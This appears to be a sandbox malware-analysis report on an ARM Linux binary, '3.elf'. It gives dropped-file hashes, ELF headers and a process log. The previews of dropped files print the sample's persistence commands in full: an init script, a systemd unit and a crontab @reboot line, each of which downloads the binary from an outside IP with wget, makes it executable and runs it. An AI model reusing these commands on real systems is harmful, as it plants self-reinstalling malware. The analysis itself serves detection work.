                Preview:#!/bin/bash.### BEGIN INIT INFO.# Provides: hello.# Required-Start: $network $local_fs.# Required-Stop: $network $local_fs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: hi :).# Description: hello :).### END INIT INFO..case "$1" in. start).wget http://103.136.41.100/3.elf -O /tmp/3.elf; chmod 777 /tmp/3.elf; /tmp/3.elf .p4 > /dev/null 2>&1. ;;. stop). exit 0. ;;. restart). $0 stop. $0 start. ;;. *). echo "Usage: $0 {start|stop|restart}". exit 1. ;;.esac..exit 0.
                Process:/tmp/3.elf
                File Type:ASCII text
                Category:dropped
                Size (bytes):207
                Entropy (8bit):5.161974435687694
                Encrypted:false
                SSDEEP:6:z8KbX9RZAMzdK+qMFF5CjtF/TsxLQmWA4Rv:zb9RZAOK+hqjtZmLHWrv
                MD5:1365826F43C96152E619A433AEB89CE0
                SHA1:0D65F064C0DBFD70286E66FD88BD18153A0E6725
                SHA-256:DCBF75C2B5BD40F45F1DC79EA96B47D86074CB3A6BE8B857FE6882E245E2F0C6
                SHA-512:109F56E948250B562EFECD9548C55265D53E8828B7A482B94DFBD925DB7CE33A759B153C4567238419B9F3C1A57F30615B59F19774ACCEDB8E8B01413D0C1010
                Malicious:false
                Reputation:low
                Preview:[Unit].Description=hi.After=network.target..[Service].ExecStart=cd /tmp; wget http://103.136.41.100/3.elf -q; chmod 777 3.elf; ./3.elf .p1 > /dev/null 2>&1.Type=oneshot..[Install].WantedBy=multi-user.target.
                Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                File Type:ASCII text
                Category:dropped
                Size (bytes):76
                Entropy (8bit):3.7627880354948586
                Encrypted:false
                SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                MD5:D86A1F5765F37989EB0EC3837AD13ECC
                SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
                Process:/tmp/3.elf
                File Type:ASCII text
                Category:dropped
                Size (bytes):97
                Entropy (8bit):4.6215253795038755
                Encrypted:false
                SSDEEP:3:SH35DMFeMPHRCWbSSa0MFaRW2sv:SH35DMFF5C+EFD5v
                MD5:E7276332E5C676C160143B41FA3F2D34
                SHA1:9862B9729B5B919408A065A091ECE812CF6A0F49
                SHA-256:09CF5EFA2D905564F31EE6034DE4827D731CDA8E7B20022CC2ABAE2A11CC7B91
                SHA-512:35B00F6F56D4A12F1AFB75A9F5B363983409CA7AFD1E70AAA3A96FD7881D482F34225136038A2D559B90A0C6A0C9E6B31E011D8C41C2AC7FBC53B6BE2F54570C
                Malicious:true
                Reputation:low
                Preview:@reboot cd /tmp; wget http://103.136.41.100/3.elf; chmod 777 3.elf; ./3.elf .p2 > /dev/null 2>&1.
                Process:/tmp/3.elf
                File Type:zlib compressed data
                Category:dropped
                Size (bytes):257
                Entropy (8bit):3.3677374991124718
                Encrypted:false
                SSDEEP:6:GYgDFzimXM/VUT4DFziu/IWz/VjmsVot/VOArB/VF:+timXNctiXr/
                MD5:B095B686ED77E7C4E60D2459F36AF617
                SHA1:434340912BCA8962DEE6713DDC73286CBA016073
                SHA-256:805CB9B160B8F36C9E712FFA4C2FEA9E017756A0342CED9A81C80CCAE49B711F
                SHA-512:DC62CC2A0B75CDE349C18E016AD86EDECCFB1DDF1AE44A364A22A14B7D96E49BB4669F1CA103809DBB930E5D1B75FFE9AF12E76EDD944A0A33B45E800F3D8E3F
                Malicious:false
                Reputation:low
                Preview:8000-1e000 r-xp 00000000 fd:00 531606 /tmp/3.elf.26000-27000 rw-p 00016000 fd:00 531606 /tmp/3.elf.27000-2c000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack]..
                Process:/usr/bin/crontab
                File Type:ASCII text
                Category:dropped
                Size (bytes):287
                Entropy (8bit):5.215004809011845
                Encrypted:false
                SSDEEP:6:SUrpqoqQjEOP1K8XAEuLuwJOBFQLNiiGMQ5UYLtCFt3HY5DMFF5C+EFD5v:8Qj7QEuLut8xiUeHLUHYCqJ3
                MD5:89CB92E293F15A2BF6E62BC50E67A361
                SHA1:EC0681DA9CA99D75D78B40636CBCA1DDD41C0963
                SHA-256:28ABCF71E72E858565FEBA5DB63A1B9DCF000C36ED434E1BBB6BAAE3704FAE35
                SHA-512:849EDDAF294379E8EB5299CC9FD4E72EE615A84D162AFE68CD72C2614231B09F4F6553D25917C02859F65AA0800F82CBFFE746C8B86BEB1A4DA298F5F66923B8
                Malicious:true
                Reputation:low
                Preview:# DO NOT EDIT THIS FILE - edit the master and reinstall..# (/tmp/crontab.tmp installed on Thu Jan 9 23:52:58 2025).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).@reboot cd /tmp; wget http://103.136.41.100/3.elf; chmod 777 3.elf; ./3.elf .p2 > /dev/null 2>&1.
                File type:ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
                Entropy (8bit):6.137592408963568
                TrID:
                • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                File name:3.elf
                File size:91'800 bytes
                MD5:647ec524d36c47ac9dc1c4c05c30e7ab
                SHA1:be9c4e9ebd6243e55257a6b2f20ef3299f34a286
                SHA256:60cf037d682bb28c7594d93f1d2bc8f1bac75b7b32a5a4caef81b68dc346d7b2
                SHA512:fe7864c84715fd33597cef7aaac46380d51e897216e6a5df36ece504e768726e6963a6f081ab8a5fde7778e998626da1f1d0bfb16fa1ada38248a77451804c06
                SSDEEP:1536:eSbCX9DPHbIRScSNq/H3roaqtq6wTmD250VmZGhUUF0M37qSnH+:iXhU0c0q/XrorsvpGVo0RF0M37le
                TLSH:59930A8AB881A612C3C255B7BB1F018E37165BA8F1DB3343AD351B61B3DB91F0E67506
                File Content Preview:.ELF...a..........(.........4....d......4. ...(.....................l^..l^...............`...`...`......@6..........Q.td..................................-...L."....Q..........0@-.\P...0....S.0...P@...0... ....R......0...0...........0... ....R..... 0....S

                ELF header

                Class:ELF32
                Data:2's complement, little endian
                Version:1 (current)
                Machine:ARM
                Version Number:0x1
                Type:EXEC (Executable file)
                OS/ABI:ARM - ABI
                ABI Version:0
                Entry Point Address:0x8190
                Flags:0x202
                ELF Header Size:52
                Program Header Offset:52
                Program Header Size:32
                Number of Program Headers:3
                Section Header Offset:91360
                Section Header Size:40
                Number of Section Headers:11
                Header String Table Index:10
                NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                NULL0x00x00x00x00x0000
                .initPROGBITS0x80940x940x180x00x6AX004
                .textPROGBITS0x80b00xb00x144480x00x6AX0016
                .finiPROGBITS0x1c4f80x144f80x140x00x6AX004
                .rodataPROGBITS0x1c50c0x1450c0x19600x00x2A004
                .eh_framePROGBITS0x260000x160000x40x00x3WA004
                .ctorsPROGBITS0x260040x160040x80x00x3WA004
                .dtorsPROGBITS0x2600c0x1600c0x80x00x3WA004
                .dataPROGBITS0x260180x160180x4800x00x3WA004
                .bssNOBITS0x264980x164980x31a80x00x3WA004
                .shstrtabSTRTAB0x00x164980x480x00x0001
                TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                LOAD0x00x80000x80000x15e6c0x15e6c6.14940x5R E0x8000.init .text .fini .rodata
                LOAD0x160000x260000x260000x4980x36406.01450x6RW 0x8000.eh_frame .ctors .dtors .data .bss
                GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                Skipped network analysis since the amount of network traffic is too extensive. Please download the PCAP and check manually.

                System Behavior

                Start time (UTC):05:52:52
                Start date (UTC):10/01/2025
                Path:/tmp/3.elf
                Arguments:/tmp/3.elf
                File size:4956856 bytes
                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                Start time (UTC):05:52:57
                Start date (UTC):10/01/2025
                Path:/tmp/3.elf
                Arguments:-
                File size:4956856 bytes
                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                Start time (UTC):05:52:57
                Start date (UTC):10/01/2025
                Path:/bin/sh
                Arguments:sh -c "systemctl daemon-reload"
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                Start time (UTC):05:52:57
                Start date (UTC):10/01/2025
                Path:/bin/sh
                Arguments:-
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                Start time (UTC):05:52:57
                Start date (UTC):10/01/2025
                Path:/usr/bin/systemctl
                Arguments:systemctl daemon-reload
                File size:996584 bytes
                MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                Start time (UTC):05:52:58
                Start date (UTC):10/01/2025
                Path:/tmp/3.elf
                Arguments:-
                File size:4956856 bytes
                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                Start time (UTC):05:52:58
                Start date (UTC):10/01/2025
                Path:/bin/sh
                Arguments:sh -c "systemctl start hello.service"
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                Start time (UTC):05:52:58
                Start date (UTC):10/01/2025
                Path:/bin/sh
                Arguments:-
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                Start time (UTC):05:52:58
                Start date (UTC):10/01/2025
                Path:/usr/bin/systemctl
                Arguments:systemctl start hello.service
                File size:996584 bytes
                MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                Start time (UTC):05:52:58
                Start date (UTC):10/01/2025
                Path:/tmp/3.elf
                Arguments:-
                File size:4956856 bytes
                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                Start time (UTC):05:52:58
                Start date (UTC):10/01/2025
                Path:/bin/sh
                Arguments:sh -c "crontab /tmp/crontab.tmp"
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                Start time (UTC):05:52:58
                Start date (UTC):10/01/2025
                Path:/bin/sh
                Arguments:-
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                Start time (UTC):05:52:58
                Start date (UTC):10/01/2025
                Path:/usr/bin/crontab
                Arguments:crontab /tmp/crontab.tmp
                File size:43720 bytes
                MD5 hash:66e521d421ac9b407699061bf21806f5

                Start time (UTC):05:52:58
                Start date (UTC):10/01/2025
                Path:/tmp/3.elf
                Arguments:-
                File size:4956856 bytes
                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                Start time (UTC):05:52:58
                Start date (UTC):10/01/2025
                Path:/bin/sh
                Arguments:sh -c "update-rc.d hello defaults"
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                Start time (UTC):05:52:58
                Start date (UTC):10/01/2025
                Path:/bin/sh
                Arguments:-
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                Start time (UTC):05:52:58
                Start date (UTC):10/01/2025
                Path:/usr/sbin/update-rc.d
                Arguments:update-rc.d hello defaults
                File size:3478464 bytes
                MD5 hash:16a21f464119ea7fad1d3660de963637

                Start time (UTC):05:52:58
                Start date (UTC):10/01/2025
                Path:/usr/sbin/update-rc.d
                Arguments:-
                File size:3478464 bytes
                MD5 hash:16a21f464119ea7fad1d3660de963637

                Start time (UTC):05:52:58
                Start date (UTC):10/01/2025
                Path:/usr/bin/systemctl
                Arguments:systemctl daemon-reload
                File size:996584 bytes
                MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                Start time (UTC):05:53:00
                Start date (UTC):10/01/2025
                Path:/tmp/3.elf
                Arguments:-
                File size:4956856 bytes
                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                Start time (UTC):05:53:00
                Start date (UTC):10/01/2025
                Path:/tmp/3.elf
                Arguments:-
                File size:4956856 bytes
                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                Start time (UTC):05:53:00
                Start date (UTC):10/01/2025
                Path:/tmp/3.elf
                Arguments:-
                File size:4956856 bytes
                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                Start time (UTC):05:53:00
                Start date (UTC):10/01/2025
                Path:/tmp/3.elf
                Arguments:-
                File size:4956856 bytes
                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                Start time (UTC):05:53:00
                Start date (UTC):10/01/2025
                Path:/tmp/3.elf
                Arguments:-
                File size:4956856 bytes
                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                Start time (UTC):05:53:00
                Start date (UTC):10/01/2025
                Path:/tmp/3.elf
                Arguments:-
                File size:4956856 bytes
                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                Start time (UTC):05:54:41
                Start date (UTC):10/01/2025
                Path:/tmp/3.elf
                Arguments:-
                File size:4956856 bytes
                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                Start time (UTC):05:54:41
                Start date (UTC):10/01/2025
                Path:/tmp/3.elf
                Arguments:-
                File size:4956856 bytes
                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                Start time (UTC):05:52:54
                Start date (UTC):10/01/2025
                Path:/usr/bin/xfce4-panel
                Arguments:-
                File size:375768 bytes
                MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                Start time (UTC):05:52:54
                Start date (UTC):10/01/2025
                Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray "Notification Area" "Area where notification icons appear"
                File size:35136 bytes
                MD5 hash:ac0b8a906f359a8ae102244738682e76

                Start time (UTC):05:52:54
                Start date (UTC):10/01/2025
                Path:/usr/bin/xfce4-panel
                Arguments:-
                File size:375768 bytes
                MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                Start time (UTC):05:52:54
                Start date (UTC):10/01/2025
                Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921 statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"
                File size:35136 bytes
                MD5 hash:ac0b8a906f359a8ae102244738682e76

                Start time (UTC):05:52:54
                Start date (UTC):10/01/2025
                Path:/usr/bin/xfce4-panel
                Arguments:-
                File size:375768 bytes
                MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                Start time (UTC):05:52:54
                Start date (UTC):10/01/2025
                Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8 12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"
                File size:35136 bytes
                MD5 hash:ac0b8a906f359a8ae102244738682e76

                Start time (UTC):05:52:54
                Start date (UTC):10/01/2025
                Path:/usr/bin/xfce4-panel
                Arguments:-
                File size:375768 bytes
                MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                Start time (UTC):05:52:54
                Start date (UTC):10/01/2025
                Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9 12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display"
                File size:35136 bytes
                MD5 hash:ac0b8a906f359a8ae102244738682e76

                Start time (UTC):05:52:54
                Start date (UTC):10/01/2025
                Path:/usr/bin/xfce4-panel
                Arguments:-
                File size:375768 bytes
                MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                Start time (UTC):05:52:54
                Start date (UTC):10/01/2025
                Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so 10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"
                File size:35136 bytes
                MD5 hash:ac0b8a906f359a8ae102244738682e76

                Start time (UTC):05:52:54
                Start date (UTC):10/01/2025
                Path:/usr/bin/xfce4-panel
                Arguments:-
                File size:375768 bytes
                MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                Start time (UTC):05:52:54
                Start date (UTC):10/01/2025
                Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925 actions "Action Buttons" "Log out, lock or other system actions"
                File size:35136 bytes
                MD5 hash:ac0b8a906f359a8ae102244738682e76

                Start time (UTC):05:52:58
                Start date (UTC):10/01/2025
                Path:/usr/lib/systemd/systemd
                Arguments:-
                File size:1620224 bytes
                MD5 hash:9b2bec7092a40488108543f9334aab75

                Start time (UTC):05:52:58
                Start date (UTC):10/01/2025
                Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                File size:22760 bytes
                MD5 hash:3633b075f40283ec938a2a6a89671b0e

                Start time (UTC):05:52:59
                Start date (UTC):10/01/2025
                Path:/usr/lib/systemd/systemd
                Arguments:-
                File size:1620224 bytes
                MD5 hash:9b2bec7092a40488108543f9334aab75

                Start time (UTC):05:52:59
                Start date (UTC):10/01/2025
                Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                File size:22760 bytes
                MD5 hash:3633b075f40283ec938a2a6a89671b0e